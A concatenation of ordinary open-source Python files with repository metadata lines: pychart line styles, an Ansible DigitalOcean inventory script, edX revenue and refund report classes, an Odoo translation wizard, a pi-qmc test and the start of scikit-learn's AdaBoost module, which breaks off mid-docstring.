For example, the dash style of (3,2,4,1) draws a dashed line that
looks like @samp{---__----_---__----_...}.
"""),
"cap_style": (IntType, 0,
"""Defines the style of the tip of the line segment.
0: butt cap (square cutoff, with no projection beyond),
1: round cap (arc), 2: projecting square cap
(square cutoff, but the line extends half the line width).
See also Postscript/PDF reference manual."""),
"join_style": (IntType, 0,
"""Join style. 0: Miter join (sharp, pointed corners),
1: round join (rounded corners),
2: bevel join (flattened corners).
See also Postscript/PDF reference manual.""")
}
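# Illustrative example of the "dash" attribute documented above (the style
# name here is made up): 3-point dashes separated by 2-point gaps.
#
#   my_dashed = T(color=color.black, width=0.7, dash=(3, 2))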
class T(chart_object.T):
__doc__ = line_style_doc.doc
keys = _keys
##AUTOMATICALLY GENERATED
##END AUTOMATICALLY GENERATED
def __str__(self):
s = name_table().lookup(self)
if s:
return s
return "<linestyle: width=%s, color=%s, dash=%s, cap=%d, join=%d>" \
% (self.width, self.color, self.dash, self.cap_style, self.join_style)
default = T(color=color.default)
dash1 = 1.5,1.5 # - - - -
dash2 = 5,2,5,2 # -- -- -- --
dash3 = 1,1
black = T(color=color.black)
black_dash1 = T(color=color.black, dash=dash1)
black_dash2 = T(color=color.black, dash=dash2)
black_dash3 = T(color=color.black, dash=dash3)
gray70 = T(color=color.gray70)
gray70_dash1 = T(color=color.gray70, dash=dash1)
gray70_dash2 = T(color=color.gray70, dash=dash2)
gray70_dash3 = T(color=color.gray70, dash=dash3)
gray10 = T(color=color.gray10)
gray10_dash1 = T(color=color.gray10, dash=dash1)
gray10_dash2 = T(color=color.gray10, dash=dash2)
gray10_dash3 = T(color=color.gray10, dash=dash3)
gray50 = T(color=color.gray50)
gray50_dash1 = T(color=color.gray50, dash=dash1)
gray50_dash2 = T(color=color.gray50, dash=dash2)
gray50_dash3 = T(color=color.gray50, dash=dash3)
gray60 = T(color=color.gray60)
gray60_dash1 = T(color=color.gray60, dash=dash1)
gray60_dash2 = T(color=color.gray60, dash=dash2)
gray60_dash3 = T(color=color.gray60, dash=dash3)
gray90 = T(color=color.gray90)
gray90_dash1 = T(color=color.gray90, dash=dash1)
gray90_dash2 = T(color=color.gray90, dash=dash2)
gray90_dash3 = T(color=color.gray90, dash=dash3)
gray30 = T(color=color.gray30)
gray30_dash1 = T(color=color.gray30, dash=dash1)
gray30_dash2 = T(color=color.gray30, dash=dash2)
gray30_dash3 = T(color=color.gray30, dash=dash3)
white = T(color=color.white)
default = black
red = T(color=color.red)
darkblue = T(color=color.darkblue)
darkseagreen = T(color=color.darkseagreen)
darkkhaki = T(color = color.darkkhaki)
blue = T(color=color.blue)
green = T(color=color.green)
red_dash1 = T(color=color.red, dash=dash1)
darkblue_dash1 = T(color=color.darkblue, dash=dash1)
darkseagreen_dash1 = T(color=color.darkseagreen, dash=dash1)
darkkhaki_dash1 = T(color=color.darkkhaki, dash=dash1)
red_dash2 = T(color=color.red, dash=dash2)
darkblue_dash2 = T(color=color.darkblue, dash=dash2)
darkseagreen_dash2 = T(color=color.darkseagreen, dash=dash2)
darkkhaki_dash2 = T(color=color.darkkhaki, dash=dash2)
standards = None
_name_table = None
def init():
global standards, _name_table
standards = object_set.T()
if theme.use_color:
standards.add(black, red, darkblue, gray70, darkseagreen,
darkkhaki, gray30,
black_dash1, red_dash1, darkblue_dash1, gray70_dash1,
darkseagreen_dash1, darkkhaki_dash1, gray30_dash1,
black_dash2, red_dash2, darkblue_dash2, gray70_dash2,
darkseagreen_dash2, darkkhaki_dash2, gray30_dash2)
else:
standards.add(black, black_dash1, black_dash2,
gray70, gray70_dash1, gray70_dash2,
gray10, gray10_dash1, gray10_dash2,
gray50, gray50_dash1, gray50_dash2,
gray90, gray90_dash1, gray90_dash2,
gray30, gray30_dash1, gray30_dash2,
black_dash3,
gray70_dash3, gray10_dash3, gray50_dash3, gray90_dash3)
for style in standards.list():
style.width = theme.default_line_width
_name_table = None
def name_table():
global _name_table
if not _name_table:
_name_table = pychart_util.symbol_lookup_table(globals(), standards)
return _name_table
init()
theme.add_reinitialization_hook(init)
|
maxalbert/ansible
|
refs/heads/devel
|
contrib/inventory/digital_ocean.py
|
33
|
#!/usr/bin/env python
'''
DigitalOcean external inventory script
======================================
Generates Ansible inventory of DigitalOcean Droplets.
In addition to the --list and --host options used by Ansible, there are options
for generating JSON of other DigitalOcean data. This is useful when creating
droplets. For example, --regions will return all the DigitalOcean Regions.
This information can also be easily found in the cache file, whose default
location is /tmp/ansible-digital_ocean.cache.
The --pretty (-p) option pretty-prints the output for better human readability.
----
Although the cache stores all the information received from DigitalOcean,
the cache is not used for current droplet information (in --list, --host,
--all, and --droplets). This is so that accurate droplet information is always
found. You can force this script to use the cache with --force-cache.
----
Configuration is read from `digital_ocean.ini`, then from environment variables,
and finally from command-line arguments.
Most notably, the DigitalOcean API Token must be specified. It can be specified
in the INI file or with the following environment variables:
export DO_API_TOKEN='abc123' or
export DO_API_KEY='abc123'
Alternatively, it can be passed on the command-line with --api-token.
If you specify DigitalOcean credentials in the INI file, a handy way to
get them into your environment (e.g., to use the digital_ocean module)
is to use the output of the --env option with export:
export $(digital_ocean.py --env)
----
The following groups are generated from --list:
- ID (droplet ID)
- NAME (droplet NAME)
- image_ID
- image_NAME
- distro_NAME (distribution NAME from image)
- region_NAME
- size_NAME
- status_STATUS
When run against a specific host, this script returns the following variables:
- do_backup_ids
- do_created_at
- do_disk
- do_features - list
- do_id
- do_image - object
- do_ip_address
- do_private_ip_address
- do_kernel - object
- do_locked
 - do_memory
- do_name
- do_networks - object
- do_next_backup_window
- do_region - object
- do_size - object
- do_size_slug
- do_snapshot_ids - list
- do_status
- do_vcpus
-----
```
usage: digital_ocean.py [-h] [--list] [--host HOST] [--all]
[--droplets] [--regions] [--images] [--sizes]
[--ssh-keys] [--domains] [--pretty]
[--cache-path CACHE_PATH]
[--cache-max_age CACHE_MAX_AGE]
[--force-cache]
[--refresh-cache]
[--api-token API_TOKEN]
Produce an Ansible Inventory file based on DigitalOcean credentials
optional arguments:
-h, --help show this help message and exit
--list List all active Droplets as Ansible inventory
(default: True)
--host HOST Get all Ansible inventory variables about a specific
Droplet
--all List all DigitalOcean information as JSON
--droplets List Droplets as JSON
--regions List Regions as JSON
--images List Images as JSON
--sizes List Sizes as JSON
--ssh-keys List SSH keys as JSON
--domains List Domains as JSON
--pretty, -p Pretty-print results
--cache-path CACHE_PATH
Path to the cache files (default: .)
--cache-max_age CACHE_MAX_AGE
Maximum age of the cached items (default: 0)
--force-cache Only use data from the cache
--refresh-cache Force refresh of cache by making API requests to
DigitalOcean (default: False - use cache files)
--api-token API_TOKEN, -a API_TOKEN
DigitalOcean API Token
```
'''
# (c) 2013, Evan Wies <evan@neomantra.net>
#
# Inspired by the EC2 inventory plugin:
# https://github.com/ansible/ansible/blob/devel/contrib/inventory/ec2.py
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
######################################################################
import os
import sys
import re
import argparse
from time import time
import ConfigParser
try:
import json
except ImportError:
import simplejson as json
try:
from dopy.manager import DoError, DoManager
except ImportError, e:
print "failed=True msg='`dopy` library required for this script'"
sys.exit(1)
class DigitalOceanInventory(object):
###########################################################################
# Main execution path
###########################################################################
def __init__(self):
''' Main execution path '''
# DigitalOceanInventory data
self.data = {} # All DigitalOcean data
self.inventory = {} # Ansible Inventory
# Define defaults
self.cache_path = '.'
self.cache_max_age = 0
# Read settings, environment variables, and CLI arguments
self.read_settings()
self.read_environment()
self.read_cli_args()
# Verify credentials were set
if not hasattr(self, 'api_token'):
print '''Could not find values for DigitalOcean api_token.
They must be specified via either ini file, command line argument (--api-token),
or environment variables (DO_API_TOKEN)'''
sys.exit(-1)
# env command, show DigitalOcean credentials
if self.args.env:
print "DO_API_TOKEN=%s" % self.api_token
sys.exit(0)
# Manage cache
self.cache_filename = self.cache_path + "/ansible-digital_ocean.cache"
self.cache_refreshed = False
        if self.is_cache_valid():
self.load_from_cache()
if len(self.data) == 0:
if self.args.force_cache:
print '''Cache is empty and --force-cache was specified'''
sys.exit(-1)
self.manager = DoManager(None, self.api_token, api_version=2)
# Pick the json_data to print based on the CLI command
if self.args.droplets:
self.load_from_digital_ocean('droplets')
json_data = {'droplets': self.data['droplets']}
elif self.args.regions:
self.load_from_digital_ocean('regions')
json_data = {'regions': self.data['regions']}
elif self.args.images:
self.load_from_digital_ocean('images')
json_data = {'images': self.data['images']}
elif self.args.sizes:
self.load_from_digital_ocean('sizes')
json_data = {'sizes': self.data['sizes']}
elif self.args.ssh_keys:
self.load_from_digital_ocean('ssh_keys')
json_data = {'ssh_keys': self.data['ssh_keys']}
elif self.args.domains:
self.load_from_digital_ocean('domains')
json_data = {'domains': self.data['domains']}
elif self.args.all:
self.load_from_digital_ocean()
json_data = self.data
elif self.args.host:
json_data = self.load_droplet_variables_for_host()
else: # '--list' this is last to make it default
self.load_from_digital_ocean('droplets')
self.build_inventory()
json_data = self.inventory
if self.cache_refreshed:
self.write_to_cache()
if self.args.pretty:
print json.dumps(json_data, sort_keys=True, indent=2)
else:
print json.dumps(json_data)
# That's all she wrote...
###########################################################################
# Script configuration
###########################################################################
def read_settings(self):
''' Reads the settings from the digital_ocean.ini file '''
config = ConfigParser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/digital_ocean.ini')
# Credentials
if config.has_option('digital_ocean', 'api_token'):
self.api_token = config.get('digital_ocean', 'api_token')
# Cache related
if config.has_option('digital_ocean', 'cache_path'):
self.cache_path = config.get('digital_ocean', 'cache_path')
if config.has_option('digital_ocean', 'cache_max_age'):
self.cache_max_age = config.getint('digital_ocean', 'cache_max_age')
def read_environment(self):
''' Reads the settings from environment variables '''
# Setup credentials
if os.getenv("DO_API_TOKEN"):
self.api_token = os.getenv("DO_API_TOKEN")
if os.getenv("DO_API_KEY"):
self.api_token = os.getenv("DO_API_KEY")
def read_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on DigitalOcean credentials')
parser.add_argument('--list', action='store_true', help='List all active Droplets as Ansible inventory (default: True)')
parser.add_argument('--host', action='store', help='Get all Ansible inventory variables about a specific Droplet')
parser.add_argument('--all', action='store_true', help='List all DigitalOcean information as JSON')
parser.add_argument('--droplets','-d', action='store_true', help='List Droplets as JSON')
parser.add_argument('--regions', action='store_true', help='List Regions as JSON')
parser.add_argument('--images', action='store_true', help='List Images as JSON')
parser.add_argument('--sizes', action='store_true', help='List Sizes as JSON')
parser.add_argument('--ssh-keys', action='store_true', help='List SSH keys as JSON')
parser.add_argument('--domains', action='store_true',help='List Domains as JSON')
parser.add_argument('--pretty','-p', action='store_true', help='Pretty-print results')
parser.add_argument('--cache-path', action='store', help='Path to the cache files (default: .)')
parser.add_argument('--cache-max_age', action='store', help='Maximum age of the cached items (default: 0)')
parser.add_argument('--force-cache', action='store_true', default=False, help='Only use data from the cache')
parser.add_argument('--refresh-cache','-r', action='store_true', default=False,
help='Force refresh of cache by making API requests to DigitalOcean (default: False - use cache files)')
parser.add_argument('--env','-e', action='store_true', help='Display DO_API_TOKEN')
parser.add_argument('--api-token','-a', action='store', help='DigitalOcean API Token')
self.args = parser.parse_args()
if self.args.api_token:
self.api_token = self.args.api_token
# Make --list default if none of the other commands are specified
if (not self.args.droplets and not self.args.regions and
not self.args.images and not self.args.sizes and
not self.args.ssh_keys and not self.args.domains and
not self.args.all and not self.args.host):
self.args.list = True
###########################################################################
# Data Management
###########################################################################
def load_from_digital_ocean(self, resource=None):
'''Get JSON from DigitalOcean API'''
if self.args.force_cache:
return
# We always get fresh droplets
if self.is_cache_valid() and not (resource=='droplets' or resource is None):
return
if self.args.refresh_cache:
resource=None
if resource == 'droplets' or resource is None:
self.data['droplets'] = self.manager.all_active_droplets()
self.cache_refreshed = True
if resource == 'regions' or resource is None:
self.data['regions'] = self.manager.all_regions()
self.cache_refreshed = True
if resource == 'images' or resource is None:
self.data['images'] = self.manager.all_images(filter=None)
self.cache_refreshed = True
if resource == 'sizes' or resource is None:
self.data['sizes'] = self.manager.sizes()
self.cache_refreshed = True
if resource == 'ssh_keys' or resource is None:
self.data['ssh_keys'] = self.manager.all_ssh_keys()
self.cache_refreshed = True
if resource == 'domains' or resource is None:
self.data['domains'] = self.manager.all_domains()
self.cache_refreshed = True
def build_inventory(self):
'''Build Ansible inventory of droplets'''
self.inventory = {}
# add all droplets by id and name
for droplet in self.data['droplets']:
            # When using private_networking the API reports the private
            # address in "ip_address", which is useless here; pick the public
            # address so Ansible can actually reach the droplet.
            if 'private_networking' in droplet['features']:
                for net in droplet['networks']['v4']:
                    if net['type'] == 'public':
                        dest = net['ip_address']
else:
dest = droplet['ip_address']
self.inventory[droplet['id']] = [dest]
self.push(self.inventory, droplet['name'], dest)
self.push(self.inventory, 'region_' + droplet['region']['slug'], dest)
self.push(self.inventory, 'image_' + str(droplet['image']['id']), dest)
self.push(self.inventory, 'size_' + droplet['size']['slug'], dest)
image_slug = droplet['image']['slug']
if image_slug:
self.push(self.inventory, 'image_' + self.to_safe(image_slug), dest)
else:
image_name = droplet['image']['name']
if image_name:
self.push(self.inventory, 'image_' + self.to_safe(image_name), dest)
self.push(self.inventory, 'distro_' + self.to_safe(droplet['image']['distribution']), dest)
self.push(self.inventory, 'status_' + droplet['status'], dest)
def load_droplet_variables_for_host(self):
'''Generate a JSON response to a --host call'''
host = int(self.args.host)
droplet = self.manager.show_droplet(host)
# Put all the information in a 'do_' namespace
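        # e.g. droplet['ip_address'] surfaces as info['do_ip_address']
        # (illustrative key; every droplet attribute is prefixed this way).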
info = {}
for k, v in droplet.items():
info['do_'+k] = v
return {'droplet': info}
###########################################################################
# Cache Management
###########################################################################
def is_cache_valid(self):
        ''' Determines if the cache file has expired or is still valid '''
if os.path.isfile(self.cache_filename):
mod_time = os.path.getmtime(self.cache_filename)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
return True
return False
def load_from_cache(self):
''' Reads the data from the cache file and assigns it to member variables as Python Objects'''
try:
cache = open(self.cache_filename, 'r')
json_data = cache.read()
cache.close()
data = json.loads(json_data)
except IOError:
data = {'data': {}, 'inventory': {}}
self.data = data['data']
self.inventory = data['inventory']
def write_to_cache(self):
''' Writes data in JSON format to a file '''
data = { 'data': self.data, 'inventory': self.inventory }
json_data = json.dumps(data, sort_keys=True, indent=2)
cache = open(self.cache_filename, 'w')
cache.write(json_data)
cache.close()
###########################################################################
# Utilities
###########################################################################
def push(self, my_dict, key, element):
        ''' Push an element onto a list that may not yet exist in the dict '''
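        # Example (illustrative values): starting from {'web': ['1.2.3.4']},
        # push(d, 'web', '5.6.7.8') appends to the existing list, while
        # push(d, 'db', '9.9.9.9') creates a new one-element list.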
if key in my_dict:
my_dict[key].append(element)
else:
my_dict[key] = [element]
def to_safe(self, word):
''' Converts 'bad' characters in a string to underscores so they can be used as Ansible groups '''
        return re.sub(r"[^A-Za-z0-9\-\.]", "_", word)
###########################################################################
# Run the script
DigitalOceanInventory()
|
UQ-UQx/edx-platform_lti
|
refs/heads/master
|
lms/djangoapps/shoppingcart/reports.py
|
66
|
""" Objects and functions related to generating CSV reports """
from decimal import Decimal
import unicodecsv
from django.utils.translation import ugettext as _
from courseware.courses import get_course_by_id
from course_modes.models import CourseMode
from shoppingcart.models import CertificateItem, OrderItem
from student.models import CourseEnrollment
from util.query import use_read_replica_if_available
from xmodule.modulestore.django import modulestore
class Report(object):
"""
Base class for making CSV reports related to revenue, enrollments, etc
To make a different type of report, write a new subclass that implements
the methods rows and header.
"""
def __init__(self, start_date, end_date, start_word=None, end_word=None):
self.start_date = start_date
self.end_date = end_date
self.start_word = start_word
self.end_word = end_word
def rows(self):
"""
        Performs the database queries necessary for the report and returns a
        generator of lists, in which each list is a separate row of the report.
Arguments are start_date (datetime), end_date (datetime), start_word (str),
and end_word (str). Date comparisons are start_date <= [date of item] < end_date.
"""
raise NotImplementedError
def header(self):
"""
Returns the appropriate header based on the report type, in the form of a
list of strings.
"""
raise NotImplementedError
def write_csv(self, filelike):
"""
Given a file object to write to and {start/end date, start/end letter} bounds,
generates a CSV report of the appropriate type.
"""
items = self.rows()
writer = unicodecsv.writer(filelike, encoding="utf-8")
writer.writerow(self.header())
for item in items:
writer.writerow(item)
class RefundReport(Report):
"""
Subclass of Report, used to generate Refund Reports for finance purposes.
For each refund between a given start_date and end_date, we find the relevant
order number, customer name, date of transaction, date of refund, and any service
fees.
"""
def rows(self):
query1 = use_read_replica_if_available(
CertificateItem.objects.select_related('user__profile').filter(
status="refunded",
refund_requested_time__gte=self.start_date,
refund_requested_time__lt=self.end_date,
).order_by('refund_requested_time'))
query2 = use_read_replica_if_available(
CertificateItem.objects.select_related('user__profile').filter(
status="refunded",
refund_requested_time=None,
))
query = query1 | query2
for item in query:
yield [
item.order_id,
item.user.profile.name,
item.fulfilled_time,
item.refund_requested_time,
item.line_cost,
item.service_fee,
]
def header(self):
return [
_("Order Number"),
_("Customer Name"),
_("Date of Original Transaction"),
_("Date of Refund"),
_("Amount of Refund"),
_("Service Fees (if any)"),
]
class ItemizedPurchaseReport(Report):
"""
Subclass of Report, used to generate itemized purchase reports.
For all purchases (verified certificates, paid course registrations, etc) between
a given start_date and end_date, we find that purchase's time, order ID, status,
quantity, unit cost, total cost, currency, description, and related comments.
"""
def rows(self):
query = use_read_replica_if_available(
OrderItem.objects.filter(
status="purchased",
fulfilled_time__gte=self.start_date,
fulfilled_time__lt=self.end_date,
).order_by("fulfilled_time"))
for item in query:
yield [
item.fulfilled_time,
item.order_id, # pylint: disable=no-member
item.status,
item.qty,
item.unit_cost,
item.line_cost,
item.currency,
item.line_desc,
item.report_comments,
]
def header(self):
return [
_("Purchase Time"),
_("Order ID"),
_("Status"),
_("Quantity"),
_("Unit Cost"),
_("Total Cost"),
_("Currency"),
_("Description"),
_("Comments")
]
class CertificateStatusReport(Report):
"""
Subclass of Report, used to generate Certificate Status Reports for Ed Services.
    For each course in each university whose name falls between start_word and end_word,
    inclusive (e.g., the letter range H-J includes both Ithaca College and Harvard University), we
calculate the total enrollment, audit enrollment, honor enrollment, verified enrollment, total
gross revenue, gross revenue over the minimum, and total dollars refunded.
"""
def rows(self):
for course_id in course_ids_between(self.start_word, self.end_word):
# If the first letter of the university is between start_word and end_word, then we include
# it in the report. These comparisons are unicode-safe.
cur_course = get_course_by_id(course_id)
university = cur_course.org
course = cur_course.number + " " + cur_course.display_name_with_default # TODO add term (i.e. Fall 2013)?
counts = CourseEnrollment.enrollment_counts(course_id)
total_enrolled = counts['total']
audit_enrolled = counts['audit']
honor_enrolled = counts['honor']
if counts['verified'] == 0:
verified_enrolled = 0
gross_rev = Decimal(0.00)
gross_rev_over_min = Decimal(0.00)
else:
verified_enrolled = counts['verified']
gross_rev = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'purchased', 'unit_cost')
gross_rev_over_min = gross_rev - (CourseMode.min_course_price_for_verified_for_currency(course_id, 'usd') * verified_enrolled)
num_verified_over_the_minimum = CertificateItem.verified_certificates_contributing_more_than_minimum(course_id)
# should I be worried about is_active here?
number_of_refunds = CertificateItem.verified_certificates_count(course_id, 'refunded')
if number_of_refunds == 0:
dollars_refunded = Decimal(0.00)
else:
dollars_refunded = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'refunded', 'unit_cost')
course_announce_date = ""
course_reg_start_date = ""
course_reg_close_date = ""
registration_period = ""
yield [
university,
course,
course_announce_date,
course_reg_start_date,
course_reg_close_date,
registration_period,
total_enrolled,
audit_enrolled,
honor_enrolled,
verified_enrolled,
gross_rev,
gross_rev_over_min,
num_verified_over_the_minimum,
number_of_refunds,
dollars_refunded
]
def header(self):
return [
_("University"),
_("Course"),
_("Course Announce Date"),
_("Course Start Date"),
_("Course Registration Close Date"),
_("Course Registration Period"),
_("Total Enrolled"),
_("Audit Enrollment"),
_("Honor Code Enrollment"),
_("Verified Enrollment"),
_("Gross Revenue"),
_("Gross Revenue over the Minimum"),
_("Number of Verified Students Contributing More than the Minimum"),
_("Number of Refunds"),
_("Dollars Refunded"),
]
class UniversityRevenueShareReport(Report):
"""
Subclass of Report, used to generate University Revenue Share Reports for finance purposes.
    For each course in each university whose name falls between start_word and end_word,
    inclusive (e.g., the letter range H-J includes both Ithaca College and Harvard University), we calculate
the total revenue generated by that particular course. This includes the number of transactions,
total payments collected, service fees, number of refunds, and total amount of refunds.
"""
def rows(self):
for course_id in course_ids_between(self.start_word, self.end_word):
cur_course = get_course_by_id(course_id)
university = cur_course.org
course = cur_course.number + " " + cur_course.display_name_with_default
total_payments_collected = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'purchased', 'unit_cost')
service_fees = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'purchased', 'service_fee')
num_refunds = CertificateItem.verified_certificates_count(course_id, "refunded")
amount_refunds = CertificateItem.verified_certificates_monetary_field_sum(course_id, 'refunded', 'unit_cost')
num_transactions = (num_refunds * 2) + CertificateItem.verified_certificates_count(course_id, "purchased")
yield [
university,
course,
num_transactions,
total_payments_collected,
service_fees,
num_refunds,
amount_refunds
]
def header(self):
return [
_("University"),
_("Course"),
_("Number of Transactions"),
_("Total Payments Collected"),
_("Service Fees (if any)"),
_("Number of Successful Refunds"),
_("Total Amount of Refunds"),
]
def course_ids_between(start_word, end_word):
"""
Returns a list of all valid course_ids that fall alphabetically between start_word and end_word.
These comparisons are unicode-safe.
"""
valid_courses = []
for course in modulestore().get_courses():
course_id = course.id.to_deprecated_string()
if start_word.lower() <= course_id.lower() <= end_word.lower():
valid_courses.append(course.id)
return valid_courses
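# Minimal usage sketch (the date bounds are placeholder values; the report
# classes are defined above):
#
#   from datetime import datetime
#   report = ItemizedPurchaseReport(datetime(2014, 1, 1), datetime(2014, 2, 1))
#   with open('purchases.csv', 'wb') as f:
#       report.write_csv(f)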
|
guerrerocarlos/odoo
|
refs/heads/8.0
|
openerp/addons/base/module/wizard/base_update_translations.py
|
447
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import cStringIO
from openerp import tools
from openerp.osv import osv, fields
from openerp.tools.translate import _
class base_update_translations(osv.osv_memory):
def _get_languages(self, cr, uid, context):
lang_obj = self.pool.get('res.lang')
ids = lang_obj.search(cr, uid, ['&', ('active', '=', True), ('translatable', '=', True),])
langs = lang_obj.browse(cr, uid, ids)
return [(lang.code, lang.name) for lang in langs]
def _get_lang_name(self, cr, uid, lang_code):
lang_obj = self.pool.get('res.lang')
ids = lang_obj.search(cr, uid, [('code', '=', lang_code)])
if not ids:
raise osv.except_osv(_('Error!'), _('No language with code "%s" exists') % lang_code)
lang = lang_obj.browse(cr, uid, ids[0])
return lang.name
def act_update(self, cr, uid, ids, context=None):
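        # Round-trip sketch: export all current terms for the selected
        # language to an in-memory CSV buffer, then re-import that buffer so
        # the translation entries are refreshed with any new source terms.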
this = self.browse(cr, uid, ids)[0]
lang_name = self._get_lang_name(cr, uid, this.lang)
buf = cStringIO.StringIO()
tools.trans_export(this.lang, ['all'], buf, 'csv', cr)
tools.trans_load_data(cr, buf, 'csv', this.lang, lang_name=lang_name)
buf.close()
return {'type': 'ir.actions.act_window_close'}
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
res = super(base_update_translations, self).default_get(cr, uid, fields, context=context)
if context.get('active_model') != "res.lang":
return res
record_id = context.get('active_id', False) or False
if record_id:
lang = self.pool.get('res.lang').browse(cr, uid, record_id).code
res.update(lang=lang)
return res
_name = 'base.update.translations'
_columns = {
'lang': fields.selection(_get_languages, 'Language', required=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
phys-tools/pi-qmc
|
refs/heads/master
|
test/system/sho/test_sho.py
|
1
|
import unittest
import subprocess
import os
import pitools
import math
class SHOTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
os.chdir("sho")
        # Run the solver and keep a copy of its output in pi.log.
        process = subprocess.Popen("../../../bin/pi-qmc",
            stdout=subprocess.PIPE, stdin=subprocess.PIPE,
            stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        process.wait()
        out = open("pi.log", "w")
        out.write(stdout)
        out.close()
cls.h5file = pitools.openFile()
@classmethod
def tearDownClass(cls):
cls.h5file.close()
os.chdir("..")
def test_energy(self):
energy = self.h5file.getScalar("thermo_energy")
e, de = energy.getAverage()
expect = 0.75/math.tanh(0.25), 0.041
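        # Reference value: thermal energy of a d-dimensional harmonic
        # oscillator, E = (d*omega/2) / tanh(beta*omega/2). The value
        # 0.75/math.tanh(0.25) is consistent with d=3, omega=0.5, beta=1
        # (inferred from the numbers here, not read from the input file).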
self.assertAlmostEqual(e, expect[0], delta=0.08, msg=
'wrong total energy, expected %f but got %f' % (expect[0], e))
self.assertAlmostEqual(de, expect[1], delta=0.01, msg=
'wrong error for energy, expected %f but got %f' % (expect[1], de))
|
eg-zhang/scikit-learn
|
refs/heads/master
|
sklearn/ensemble/weight_boosting.py
|
71
|
"""Weight Boosting
This module contains weight boosting estimators for both classification and
regression.
The module structure is the following:
- The ``BaseWeightBoosting`` base class implements a common ``fit`` method
for all the estimators in the module. Regression and classification
only differ from each other in the loss function that is optimized.
- ``AdaBoostClassifier`` implements adaptive boosting (AdaBoost-SAMME) for
classification problems.
- ``AdaBoostRegressor`` implements adaptive boosting (AdaBoost.R2) for
regression problems.
"""
# Authors: Noel Dawe <noel@dawe.me>
# Gilles Louppe <g.louppe@gmail.com>
# Hamzeh Alsalhi <ha258@cornell.edu>
# Arnaud Joly <arnaud.v.joly@gmail.com>
#
# Licence: BSD 3 clause
from abc import ABCMeta, abstractmethod
import numpy as np
from numpy.core.umath_tests import inner1d
from .base import BaseEnsemble
from ..base import ClassifierMixin, RegressorMixin
from ..externals import six
from ..externals.six.moves import zip
from ..externals.six.moves import xrange as range
from .forest import BaseForest
from ..tree import DecisionTreeClassifier, DecisionTreeRegressor
from ..tree.tree import BaseDecisionTree
from ..tree._tree import DTYPE
from ..utils import check_array, check_X_y, check_random_state
from ..metrics import accuracy_score, r2_score
from sklearn.utils.validation import has_fit_parameter, check_is_fitted
__all__ = [
'AdaBoostClassifier',
'AdaBoostRegressor',
]
class BaseWeightBoosting(six.with_metaclass(ABCMeta, BaseEnsemble)):
"""Base class for AdaBoost estimators.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator=None,
n_estimators=50,
estimator_params=tuple(),
learning_rate=1.,
random_state=None):
super(BaseWeightBoosting, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params)
self.learning_rate = learning_rate
self.random_state = random_state
def fit(self, X, y, sample_weight=None):
"""Build a boosted classifier/regressor from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. COO, DOK, and LIL are converted to CSR. The dtype is
forced to DTYPE from tree._tree if the base classifier of this
ensemble weighted boosting classifier is a tree or forest.
y : array-like of shape = [n_samples]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like of shape = [n_samples], optional
Sample weights. If None, the sample weights are initialized to
1 / n_samples.
Returns
-------
self : object
Returns self.
"""
# Check parameters
if self.learning_rate <= 0:
raise ValueError("learning_rate must be greater than zero")
if (self.base_estimator is None or
isinstance(self.base_estimator, (BaseDecisionTree,
BaseForest))):
dtype = DTYPE
accept_sparse = 'csc'
else:
dtype = None
accept_sparse = ['csr', 'csc']
X, y = check_X_y(X, y, accept_sparse=accept_sparse, dtype=dtype)
if sample_weight is None:
# Initialize weights to 1 / n_samples
sample_weight = np.empty(X.shape[0], dtype=np.float)
sample_weight[:] = 1. / X.shape[0]
else:
# Normalize existing weights
sample_weight = sample_weight / sample_weight.sum(dtype=np.float64)
# Check that the sample weights sum is positive
if sample_weight.sum() <= 0:
raise ValueError(
"Attempting to fit with a non-positive "
"weighted number of samples.")
# Check parameters
self._validate_estimator()
# Clear any previous fit results
self.estimators_ = []
self.estimator_weights_ = np.zeros(self.n_estimators, dtype=np.float)
self.estimator_errors_ = np.ones(self.n_estimators, dtype=np.float)
for iboost in range(self.n_estimators):
# Boosting step
sample_weight, estimator_weight, estimator_error = self._boost(
iboost,
X, y,
sample_weight)
# Early termination
if sample_weight is None:
break
self.estimator_weights_[iboost] = estimator_weight
self.estimator_errors_[iboost] = estimator_error
# Stop if error is zero
if estimator_error == 0:
break
sample_weight_sum = np.sum(sample_weight)
# Stop if the sum of sample weights has become non-positive
if sample_weight_sum <= 0:
break
if iboost < self.n_estimators - 1:
# Normalize
sample_weight /= sample_weight_sum
return self
@abstractmethod
def _boost(self, iboost, X, y, sample_weight):
"""Implement a single boost.
        Warning: This method needs to be overridden by subclasses.
Parameters
----------
iboost : int
The index of the current boost iteration.
